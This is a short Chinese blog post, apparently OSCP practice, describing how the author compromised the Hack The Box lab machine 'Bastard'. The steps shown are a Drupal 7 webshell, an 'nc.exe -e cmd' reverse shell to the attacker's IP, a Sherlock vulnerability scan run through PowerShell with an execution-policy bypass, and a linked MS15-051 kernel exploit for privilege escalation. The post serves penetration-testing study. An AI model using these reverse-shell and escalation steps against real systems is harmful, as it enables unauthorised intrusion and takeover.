oscp——HTB——Bastard

最新推荐文章于 2023-12-03 09:29:35 发布
最新推荐文章于 2023-12-03 09:29:35 发布
阅读量551 收藏
点赞数
分类专栏: oscp
本文为博主原创文章,未经博主允许不得转载,未授权转载为侵权行为,违反法律。
本文链接:https://blog.csdn.net/qq_36869808/article/details/106238241
版权

0x00 前言

难度

入门1级
在这里插入图片描述

0x01 信息收集

在这里插入图片描述

0x02 Web——Webshell

这里访问之后看到是一个Drupal的站,Drupal的站在7.0可以直接直接getshell
在这里插入图片描述
使用脚本直接getshell
在这里插入图片描述

0x03 Webshell——Rootshell

传一个nc 上去然后反弹一个shell

nc.exe -e cmd 10.10.14.6 1234

这里可以使用Sherlock先进行扫描。

powershell.exe -exec bypass -Command "& {Import-Module C:\inetpub\drupal-7.54\Sherlock.ps1;Find-AllVulns}

在这里插入图片描述

这里先试了一下ms16-032,但是好像不起作用。

本来享用msf直接打ms15_051,最后发现msf的是32位的payload,只能在github上下载了。

https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/

在这里插入图片描述

然后再回弹一个shell就行

王嘟嘟_
关注
专栏目录
HTB Busqueda WriteUP
qq_58869808的博客
04-09 6801
Busqueda WriteUP
HTB靶场系列】Bastard
Ms08067安全实验室
07-28 257
点击星标,即时接收最新推文#01实验信息靶机:10.10.10.9Kali:10.10.16.2#02实验过程靶机打开的端口很少,接下来扫描端口的详细信息根据信息可以得出靶机是IIS搭建的,网站有robots.txt里面有很多可用信息接下来 再对靶机进行 常用漏洞脚本扫描 以及 常见UDP端口扫描,没有什么出现其他的可用信息那么这里的突破口就主要就是80端口通过刚刚nmap的扫描结果得出靶机用的是...
HTB-Bastard
TA不懒,但还没有添加简介
04-07 564
HTB-Bastard
HTB系列之七:Bastard
Ms08067安全实验室
12-13 607
这次挑战的是 HTB 的第7台靶机:Bastard技能收获:PHP UnserilaizeCMS Version IdentifyWindows privilege escalation...
HTB-oscplike-Bastard+Granny
m0_53302733的博客
04-05 1126
HTB-oscplike-Bastard+Granny Bastard medium难度的bastard 靶机IP 10.10.10.9 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.9 80/tcp open http Microsoft IIS httpd 7.5 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Win
OSCP - symfonos writeup
Jiajiajiang_的博客
04-30 513
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/symfonos/symfonos1.7z 发现IP IP为10.0.3.150 nmap SMB 直接使用SMB协议,使用anonymous用户登录 发现一个文件 我猜有人用了这些密码 还发现一个用户 试一下用上面的密码登录下helios smbclient //10.0....
OSCP-Vulnhub靶机记录-digitalworldlocal-fall
深入交流学习:webMsec
09-30 263
-hh 隐藏char值为80的结果(错误的参数都这里报80,第一次wfuzz没有加此参数)尝试用读取/home/qiu目录下默认存ssh密钥文件,通过前面扫描端口知道他是开了ssh的。vulnhub和htb有很多为OSCP准备的靶机,都可以打一打。再回leafpad,搜索一下“enum”,看看枚举出什么目录。复制保存到攻击机,key文件最后要有一个回车,否则登录不上去。这里的GET参数是 file,可以尝试文件包含。那么,我们可以试一下,用哪个参数可以拼接进去。ls 一下,提示我们是低权限用户。
OSCP认证学习资源汇总.zip
08-19
0x0001-OSCP学习资料PWK v1.15-带书签 0x0002-OSCE学习资料-CPTV 1.0 0x0003-OSCP考试命令大全 0x0004-INE机构OSCP课程 0x0005-bof真题文件 0x0006-缓冲区溢出题目全套解决方案 0x0007-OSCP报告模板参考 0x0008-题型...
OSCP网络安全认证
10-19
**OSCP网络安全认证详解** OSCP(Offensive Security Certified Professional)是网络安全领域内备受推崇的专业认证,由Offensive Security公司颁发。它专为那些希望通过Kali Linux进行渗透测试的网络安全专家设计...
OSCP-PWK:https
04-27
OSCP 提供了更好的阅读体验,因为回购协议大多类似于草稿和备份。 注释和备忘单位于Wiki页面中。 回购中充斥着TryHackMe编写的内容和二进制文件。 卡利配置 ohmyzsh + powerlevel10K + tmux Kali 2020.3的提示:...
opencore-amr编译库支持64位,支持真机和模拟器
02-04
编译自opencore-amr-0.1.3,编译环境XCode6.1.1下iOS8 SDK。支持arm64 armv7s x86_64 i386 armv7。
SQL BAK Reader
04-02
一款查看SQLSERVER备份文件详细信息的小工具 Open your SQL Server backup file using SQL BAK Reader, and all the details of that file will be displayed. The output is similar to the RESTORE HEADERONLY and RESTORE FILELISTONLY results.Does not require SQL Server to be installed, so you can easily determine the contents of a backup file on any computer, or in cases where you do not have the right SQL Server version installed to read the backup file.
openmv板球系统.rar
07-31
基于OPENMV的板球系统,只使用了openmv2,未使用其他任何单片机,目前只有定点在中心点, 使用效果详情:https://www.bilibili.com/video/av50817364/
海康isc配置手册.rar
07-26
Hikvision海康iSecure center综合安防管理平台配置手册,区域管理,人员管理,车辆管理,人员发卡,视频监控,门禁管理,访客管理
几大高薪安全认证,考取一个离娶“白富美”就不远了!!
最新发布
qq_53058639的博客
12-03 899
随着互联网、物联网的快速发展,信息安全行业目前存在巨大的人才缺口,而且随着企业对安全的投入力度持续加大,未来人才短缺的问题会更加严重。万事万物的定价都是**“物以希为贵"所以"资格证书""白富美”**就不远了。根据Global Knowledge的报告,与安全有关的认证每年比中位数的IT认证薪水平均高出17000美元,最有价值IT认证排行榜TOP5中安全相关认证就占据三席!
[HTB]“Heist”靶机渗透详细思路
墨痕诉清风的博客
01-02 763
1.信息搜集2.寻找80端口信息泄漏的密码3.通过已知的用户枚举可能的用户名密码。4.寻找主机的其他用户5.5985端口的入侵以及拿shell6.找管理员操作进程,提取进程文件,拿到管理员密码,并拿shell。
渗透测试3:HTB之Resolute
d3f4ult的博客
01-18 7213
文章目录介绍前期准备工作 介绍 Hackthebox的resolute靶机操作系统为windows,之前没有接触过windows系统的渗透,不过在大佬的提示下还是拿到了flag。 通过此次渗透可以学习到: 1.rpcclinet命令的使用 2.enum4linux工具的使用 3.windows系统渗透大体思路。 4.nc.exe工具的使用 5.msfvenom工具的使用,进而接触到了veil,话说...
最牛的计算机考证
weixin_63757008的博客
12-21 362
2021年IT行业10大认证: 网络安全认证 云架构师认证 项目管理和 IT 服务管理认证 DevOps 工程师认证 数据库管理员认证 数字营销认证 网络工程师认证 网络开发认证 大数据工程师认证 人工智能和机器学习工程师认证 因此,让我们开始我们的2021年10大认证列表。 1.网络安全认证 随着世界努力应对这种前所未有的大流行,远程工作已成为新常态。但是,由于远程访问 IT 基础设施和在端点设备上使用协作工具,这带来了很多网络威胁。在这样的时代,经过网络安全认证的专业人员是无名英...
OSCP实战:Raven2靶机渗透及PHPMailer漏洞利用
在OSCP(Offensive Security Certified Professional)认证的学习过程中,一个重要的实践环节就是通过渗透测试来提升实战技能。Raven2靶机是一种被推荐的训练平台,它模拟了一个复杂的网络安全环境,让学生能够在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

王嘟嘟_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值